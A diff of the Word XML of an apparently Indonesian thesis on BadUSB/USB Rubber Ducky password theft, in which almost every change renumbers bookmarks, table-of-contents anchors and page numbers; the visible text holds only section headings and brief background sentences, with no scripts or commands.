+          <w:hyperlink w:anchor="_Toc43264869" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -9798,7 +9798,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262101 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264869 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9818,7 +9818,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>59</w:t>
+              <w:t>60</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9843,7 +9843,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262102" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264870" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -9870,7 +9870,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262102 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264870 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9890,7 +9890,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>60</w:t>
+              <w:t>61</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9989,7 +9989,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc75146103"/>
       <w:bookmarkStart w:id="16" w:name="_Toc463344418"/>
-      <w:bookmarkStart w:id="17" w:name="_Toc43262042"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc43264810"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR GAMBAR DAN ILUSTRASI</w:t>
@@ -13649,7 +13649,7 @@
       </w:r>
       <w:bookmarkStart w:id="18" w:name="_Toc75146104"/>
       <w:bookmarkStart w:id="19" w:name="_Toc463344419"/>
-      <w:bookmarkStart w:id="20" w:name="_Toc43262043"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc43264811"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR TABEL</w:t>
@@ -14289,7 +14289,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc43262044"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc43264812"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -15289,7 +15289,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc43262045"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc43264813"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DAFTAR </w:t>
@@ -15616,7 +15616,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="23" w:name="_Toc75146106"/>
       <w:bookmarkStart w:id="24" w:name="_Toc463344421"/>
-      <w:bookmarkStart w:id="25" w:name="_Toc43262046"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc43264814"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -15627,22 +15627,20 @@
       <w:r>
         <w:t>endahuluan</w:t>
       </w:r>
-      <w:bookmarkStart w:id="26" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="23"/>
       <w:bookmarkEnd w:id="24"/>
       <w:bookmarkEnd w:id="25"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc43264815"/>
+      <w:r>
+        <w:t>Latar Belakang</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="26"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc43262047"/>
-      <w:r>
-        <w:t>Latar Belakang</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15781,7 +15779,7 @@
           <w:u w:val="single"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Hlk32935731"/>
+      <w:bookmarkStart w:id="27" w:name="_Hlk32935731"/>
       <w:r>
         <w:t xml:space="preserve">Seiring dengan perkembangan sistem operasi Windows, aplikasi </w:t>
       </w:r>
@@ -15794,7 +15792,7 @@
       <w:r>
         <w:t xml:space="preserve"> juga berkembang pesat.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="27"/>
       <w:r>
         <w:t xml:space="preserve"> Berbagai aplikasi </w:t>
       </w:r>
@@ -15813,7 +15811,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="29" w:name="_Hlk32935753"/>
+      <w:bookmarkStart w:id="28" w:name="_Hlk32935753"/>
       <w:r>
         <w:t xml:space="preserve">Aplikasi </w:t>
       </w:r>
@@ -15868,7 +15866,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="28"/>
       <w:r>
         <w:t xml:space="preserve"> Salah satu fitur yang dimiliki oleh </w:t>
       </w:r>
@@ -15926,7 +15924,7 @@
       <w:r>
         <w:t xml:space="preserve"> yang membutuhkan akun pengguna untuk menjalankannya. </w:t>
       </w:r>
-      <w:bookmarkStart w:id="30" w:name="_Hlk32935850"/>
+      <w:bookmarkStart w:id="29" w:name="_Hlk32935850"/>
       <w:r>
         <w:t xml:space="preserve">Pada kenyataannya fitur menyimpan password pada </w:t>
       </w:r>
@@ -16026,7 +16024,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="29"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -16145,11 +16143,11 @@
       <w:r>
         <w:t xml:space="preserve">BadUSB merupakan perangkat USB yang dimanipulasi oleh penyerang, </w:t>
       </w:r>
-      <w:bookmarkStart w:id="31" w:name="_Hlk32936326"/>
+      <w:bookmarkStart w:id="30" w:name="_Hlk32936326"/>
       <w:r>
         <w:t>agar saat terdeteksi oleh komputer target perangkat ini akan dikenali sebagai perangkat antar muka USB biasa, seperti keyboard komputer.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="30"/>
       <w:r>
         <w:t xml:space="preserve"> Bentuk serangan dari BadUSB semakin beragam pada saat ini yang meliputi USBdriveby, Evilduino, </w:t>
       </w:r>
@@ -16367,11 +16365,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc43262048"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc43264816"/>
       <w:r>
         <w:t>Rumusan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16508,11 +16506,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc43262049"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc43264817"/>
       <w:r>
         <w:t>Tujuan Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16655,11 +16653,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc43262050"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc43264818"/>
       <w:r>
         <w:t>Manfaat Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="33"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16774,11 +16772,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="_Toc43262051"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc43264819"/>
       <w:r>
         <w:t>Batasan Masalah</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16930,11 +16928,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc43262052"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc43264820"/>
       <w:r>
         <w:t>Sistematika Penulisan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="35"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -17129,12 +17127,12 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="37" w:name="_Toc43262053"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc43264821"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Kajian Teori</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -17145,7 +17143,7 @@
           <w:iCs/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc43262054"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc43264822"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -17154,7 +17152,7 @@
         </w:rPr>
         <w:t>Microcontroller</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17485,7 +17483,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc43262055"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc43264823"/>
       <w:r>
         <w:rPr>
           <w:iCs/>
@@ -17493,7 +17491,7 @@
         </w:rPr>
         <w:t>Arduino</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17860,7 +17858,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc43262056"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc43264824"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -17870,7 +17868,7 @@
       <w:r>
         <w:t>rduino Intergated Development Environment (IDE)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18039,7 +18037,7 @@
           <w:i/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc43262057"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc43264825"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -18047,7 +18045,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Password Attack</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="40"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18329,14 +18327,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="42" w:name="_Toc43262058"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc43264826"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Nirsoft.net</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="42"/>
+      <w:bookmarkEnd w:id="41"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18605,14 +18603,14 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="43" w:name="_Toc43262059"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc43264827"/>
       <w:r>
         <w:t xml:space="preserve">Microsoft </w:t>
       </w:r>
       <w:r>
         <w:t>Powershell</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="43"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18893,11 +18891,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="44" w:name="_Toc43262060"/>
+      <w:bookmarkStart w:id="43" w:name="_Toc43264828"/>
       <w:r>
         <w:t>Sistem Operasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="44"/>
+      <w:bookmarkEnd w:id="43"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19063,7 +19061,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="45" w:name="_Toc43262061"/>
+      <w:bookmarkStart w:id="44" w:name="_Toc43264829"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -19073,7 +19071,7 @@
       <w:r>
         <w:t xml:space="preserve"> (USB)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="45"/>
+      <w:bookmarkEnd w:id="44"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19312,11 +19310,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="46" w:name="_Toc43262062"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc43264830"/>
       <w:r>
         <w:t>USB Rubber Ducky</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="46"/>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19938,11 +19936,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="47" w:name="_Toc43262063"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc43264831"/>
       <w:r>
         <w:t>Perbandingan dengan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="47"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19952,7 +19950,7 @@
           <w:b w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="48" w:name="_Toc26430686"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc26430686"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -19996,7 +19994,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Perbandingan penelitian sebelumnya</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="48"/>
+      <w:bookmarkEnd w:id="47"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -20418,14 +20416,14 @@
         <w:pStyle w:val="Heading1"/>
         <w:ind w:hanging="142"/>
       </w:pPr>
-      <w:bookmarkStart w:id="49" w:name="_Toc43262064"/>
+      <w:bookmarkStart w:id="48" w:name="_Toc43264832"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Metodologi Penelitian</w:t>
       </w:r>
-      <w:bookmarkStart w:id="50" w:name="_Toc75146113"/>
-      <w:bookmarkStart w:id="51" w:name="_Toc463344429"/>
-      <w:bookmarkEnd w:id="49"/>
+      <w:bookmarkStart w:id="49" w:name="_Toc75146113"/>
+      <w:bookmarkStart w:id="50" w:name="_Toc463344429"/>
+      <w:bookmarkEnd w:id="48"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20438,11 +20436,11 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="52" w:name="_Toc43262065"/>
+      <w:bookmarkStart w:id="51" w:name="_Toc43264833"/>
       <w:r>
         <w:t>Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="52"/>
+      <w:bookmarkEnd w:id="51"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20532,7 +20530,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="53" w:name="_Toc43258645"/>
+      <w:bookmarkStart w:id="52" w:name="_Toc43258645"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -20584,7 +20582,7 @@
         </w:rPr>
         <w:t>. Metode Konseptual</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="53"/>
+      <w:bookmarkEnd w:id="52"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20596,7 +20594,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="54" w:name="_Toc43262066"/>
+      <w:bookmarkStart w:id="53" w:name="_Toc43264834"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -20617,7 +20615,7 @@
         </w:rPr>
         <w:t>Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="54"/>
+      <w:bookmarkEnd w:id="53"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20675,7 +20673,7 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="55" w:name="_Toc43258646"/>
+      <w:bookmarkStart w:id="54" w:name="_Toc43258646"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -20727,7 +20725,7 @@
         </w:rPr>
         <w:t>. Sistematika Penelitian</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="55"/>
+      <w:bookmarkEnd w:id="54"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -20735,12 +20733,12 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="56" w:name="_Toc43262067"/>
+      <w:bookmarkStart w:id="55" w:name="_Toc43264835"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Inisiasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="56"/>
+      <w:bookmarkEnd w:id="55"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20762,11 +20760,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="57" w:name="_Toc43262068"/>
+      <w:bookmarkStart w:id="56" w:name="_Toc43264836"/>
       <w:r>
         <w:t>Hipotesis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="57"/>
+      <w:bookmarkEnd w:id="56"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20788,11 +20786,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="58" w:name="_Toc43262069"/>
+      <w:bookmarkStart w:id="57" w:name="_Toc43264837"/>
       <w:r>
         <w:t>Simulasi</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="58"/>
+      <w:bookmarkEnd w:id="57"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20941,11 +20939,11 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="59" w:name="_Toc43262070"/>
+      <w:bookmarkStart w:id="58" w:name="_Toc43264838"/>
       <w:r>
         <w:t>Akhir</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="59"/>
+      <w:bookmarkEnd w:id="58"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -20980,12 +20978,12 @@
         <w:pStyle w:val="Heading3"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="60" w:name="_Toc43262071"/>
+      <w:bookmarkStart w:id="59" w:name="_Toc43264839"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Pelaporan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="60"/>
+      <w:bookmarkEnd w:id="59"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21005,7 +21003,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="61" w:name="_Toc43262072"/>
+      <w:bookmarkStart w:id="60" w:name="_Toc43264840"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -21052,26 +21050,26 @@
       <w:r>
         <w:t>enyerangan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="60"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="61" w:name="_Toc43264841"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t>Perancangan Sistem</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="61"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="62" w:name="_Toc43262073"/>
-      <w:r>
-        <w:rPr>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t>Perancangan Sistem</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="62"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21224,9 +21222,9 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="63" w:name="_Toc43087604"/>
-      <w:bookmarkStart w:id="64" w:name="_Toc43087898"/>
-      <w:bookmarkStart w:id="65" w:name="_Toc43258875"/>
+      <w:bookmarkStart w:id="62" w:name="_Toc43087604"/>
+      <w:bookmarkStart w:id="63" w:name="_Toc43087898"/>
+      <w:bookmarkStart w:id="64" w:name="_Toc43258875"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -21278,9 +21276,9 @@
         </w:rPr>
         <w:t>. Ilustrasi Penyerangan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="62"/>
       <w:bookmarkEnd w:id="63"/>
       <w:bookmarkEnd w:id="64"/>
-      <w:bookmarkEnd w:id="65"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21447,7 +21445,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="_Toc43262074"/>
+      <w:bookmarkStart w:id="65" w:name="_Toc43264842"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -21462,7 +21460,7 @@
         </w:rPr>
         <w:t>Hardware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="66"/>
+      <w:bookmarkEnd w:id="65"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -21501,8 +21499,8 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="67" w:name="_Toc43089946"/>
-      <w:bookmarkStart w:id="68" w:name="_Toc43089989"/>
+      <w:bookmarkStart w:id="66" w:name="_Toc43089946"/>
+      <w:bookmarkStart w:id="67" w:name="_Toc43089989"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -21564,8 +21562,8 @@
         </w:rPr>
         <w:t>Harware</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="66"/>
       <w:bookmarkEnd w:id="67"/>
-      <w:bookmarkEnd w:id="68"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -22232,7 +22230,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="_Toc43262075"/>
+      <w:bookmarkStart w:id="68" w:name="_Toc43264843"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -22247,7 +22245,7 @@
         </w:rPr>
         <w:t>Software</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="69"/>
+      <w:bookmarkEnd w:id="68"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -22274,8 +22272,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="70" w:name="_Toc43089947"/>
-      <w:bookmarkStart w:id="71" w:name="_Toc43089990"/>
+      <w:bookmarkStart w:id="69" w:name="_Toc43089947"/>
+      <w:bookmarkStart w:id="70" w:name="_Toc43089990"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -22337,8 +22335,8 @@
         </w:rPr>
         <w:t>Software</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="69"/>
       <w:bookmarkEnd w:id="70"/>
-      <w:bookmarkEnd w:id="71"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -23212,7 +23210,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="72" w:name="_Toc43262076"/>
+      <w:bookmarkStart w:id="71" w:name="_Toc43264844"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -23220,7 +23218,7 @@
         </w:rPr>
         <w:t>Mekanisme Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="72"/>
+      <w:bookmarkEnd w:id="71"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23671,9 +23669,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="73" w:name="_Toc43087605"/>
-      <w:bookmarkStart w:id="74" w:name="_Toc43087899"/>
-      <w:bookmarkStart w:id="75" w:name="_Toc43258876"/>
+      <w:bookmarkStart w:id="72" w:name="_Toc43087605"/>
+      <w:bookmarkStart w:id="73" w:name="_Toc43087899"/>
+      <w:bookmarkStart w:id="74" w:name="_Toc43258876"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -23725,9 +23723,9 @@
         </w:rPr>
         <w:t>. Alur Penyerangan</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="72"/>
       <w:bookmarkEnd w:id="73"/>
       <w:bookmarkEnd w:id="74"/>
-      <w:bookmarkEnd w:id="75"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23767,8 +23765,8 @@
           <w:bCs w:val="0"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="76" w:name="_Toc43089948"/>
-      <w:bookmarkStart w:id="77" w:name="_Toc43089991"/>
+      <w:bookmarkStart w:id="75" w:name="_Toc43089948"/>
+      <w:bookmarkStart w:id="76" w:name="_Toc43089991"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -23821,8 +23819,8 @@
         </w:rPr>
         <w:t>. Kerentanan dan Ancaman</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="75"/>
       <w:bookmarkEnd w:id="76"/>
-      <w:bookmarkEnd w:id="77"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -24649,7 +24647,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="78" w:name="_Toc43262077"/>
+      <w:bookmarkStart w:id="77" w:name="_Toc43264845"/>
       <w:r>
         <w:rPr>
           <w:bCs w:val="0"/>
@@ -24657,7 +24655,7 @@
         </w:rPr>
         <w:t>Pengembangan Sistem</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="78"/>
+      <w:bookmarkEnd w:id="77"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -24733,7 +24731,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="79" w:name="_Toc43262078"/>
+      <w:bookmarkStart w:id="78" w:name="_Toc43264846"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -24749,7 +24747,7 @@
         </w:rPr>
         <w:t>Ducky Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="79"/>
+      <w:bookmarkEnd w:id="78"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30005,9 +30003,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="80" w:name="_Toc43087606"/>
-      <w:bookmarkStart w:id="81" w:name="_Toc43087900"/>
-      <w:bookmarkStart w:id="82" w:name="_Toc43258877"/>
+      <w:bookmarkStart w:id="79" w:name="_Toc43087606"/>
+      <w:bookmarkStart w:id="80" w:name="_Toc43087900"/>
+      <w:bookmarkStart w:id="81" w:name="_Toc43258877"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -30069,9 +30067,9 @@
         </w:rPr>
         <w:t>Ducky Script</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="79"/>
       <w:bookmarkEnd w:id="80"/>
       <w:bookmarkEnd w:id="81"/>
-      <w:bookmarkEnd w:id="82"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30810,9 +30808,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="83" w:name="_Toc43087607"/>
-      <w:bookmarkStart w:id="84" w:name="_Toc43087901"/>
-      <w:bookmarkStart w:id="85" w:name="_Toc43258878"/>
